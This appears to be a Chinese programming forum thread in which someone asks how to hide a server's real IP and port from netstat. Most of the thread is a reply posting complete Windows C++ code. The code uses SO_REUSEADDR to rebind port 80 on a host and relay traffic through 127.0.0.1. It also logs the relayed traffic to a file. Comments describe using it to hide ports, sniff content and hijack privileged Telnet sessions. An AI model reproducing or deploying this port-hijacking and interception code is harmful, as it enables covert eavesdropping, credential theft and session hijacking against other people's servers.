例如我要client 连接 server .. 在本机netstat -an   不能显示出真实的服务端IP或端口...就如下图应该是用了数据转发,但是我现在思路有点乱,我希望有朋友可以开导我一下

解决方案 »

  1.   

    补充一下,有C++的数据转发代码,但是我看不懂什么意思。#include "stdafx.h" 
    #include <winsock2.h> 
    #include <windows.h> 
    //#include <stdio.h> 
    #include <stdlib.h> 
    #include <fstream.h> DWORD WINAPI ClientThread(LPVOID lpParam); int main(int argc, char* argv[]) 

    if (argc!=2) 

    printf("using: listen [your ip address]\nfor example:\n listen 202.112.246.2\n"); 
    return 0; 
    } WORD wVersionRequested; 
    DWORD ret; 
    WSADATA wsaData; 
    BOOL val; 
    SOCKADDR_IN saddr; 
    SOCKADDR_IN scaddr; 
    int err; 
    SOCKET s; 
    SOCKET sc; 
    int caddsize; 
    HANDLE mt; 
    DWORD tid; wVersionRequested = MAKEWORD( 2, 2 ); 
    err = WSAStartup( wVersionRequested, &wsaData ); 
    if ( err != 0 ) { 
    printf("error!WSAStartup failed!\n"); 
    return -1; 

    saddr.sin_family = AF_INET; //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了 
    saddr.sin_addr.s_addr = inet_addr(argv[1]); 
    saddr.sin_port = htons(80); 
    if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) 

    printf("error!socket failed!\n"); 
    return -1; 

    val = TRUE; 
    //SO_REUSEADDR选项就是可以实现端口重绑定的 
    if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0) 

    printf("error!setsockopt failed!\n"); 
    return -1; 

    //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码; 
    //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽 
    //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击 
    if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR) 

    ret=GetLastError(); 
    printf("error!bind failed!\n"); 
    return -1; 

    listen(s,2); 
    while(1) 

    caddsize = sizeof(scaddr); 
    //接受连接请求 
    sc = accept(s,(struct sockaddr *)&scaddr,&caddsize); 
    if(sc!=INVALID_SOCKET) 

    mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid); 
    if(mt==NULL) 

    printf("Thread Creat Failed!\n"); 
    break; 


    CloseHandle(mt); 

    closesocket(s); 
    WSACleanup(); 
    return 0; 
    } DWORD WINAPI ClientThread(LPVOID lpParam) 

    SOCKET ss = (SOCKET)lpParam; 
    SOCKET sc; 
    char buf[4096]; 
    SOCKADDR_IN saddr; 
    long num; 
    DWORD val; 
    DWORD ret; 
    //如果是隐藏端口应用的话,可以在此处加一些判断 
    //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发 saddr.sin_family = AF_INET; 
    saddr.sin_addr.s_addr = inet_addr("127.0.0.1"); 
    saddr.sin_port = htons(80); 
    if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) 

    printf("error!socket failed!\n"); 
    return -1; 

    val = 100; 
    if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0) 

    ret = GetLastError(); 
    return -1; 

    if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0) 

    ret = GetLastError(); 
    return -1; 

    if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0) 

    printf("error!socket connect failed!\n"); 
    closesocket(sc); 
    closesocket(ss); 
    return -1; 

    // 写入文件: 
    ofstream oFile("port80log.txt"); 
    if(!oFile) 

    printf("cannot write to the file.\n"); 
    closesocket(ss); 
    closesocket(sc); 
    return 0 ; 
    } while(1) 

    //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。 
    //如果是嗅探内容的话,可以再此处进行内容分析和记录 
    //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。 
    num = recv(ss,buf,4096,0); 
    if(num>0) 

    oFile<<"\n== DATA =========================================\n"; 
    oFile<<buf; 
    send(sc,buf,num,0); 

    else if(num==0) 
    break; 
    num = recv(sc,buf,4096,0); 
    if(num>0) 

    oFile<<"\n== DATA =========================================\n"; 
    oFile<<buf; 
    send(ss,buf,num,0); 

    else if(num==0) 
    break; 

    oFile.close(); closesocket(ss); 
    closesocket(sc); 
    return 0 ; 

      

  2.   

    REUSEADDR 
    对这个端口绑定俩次
    然后有新的连接进来,再创建一个本地socket 去 连接开始accept的socket新的连接通讯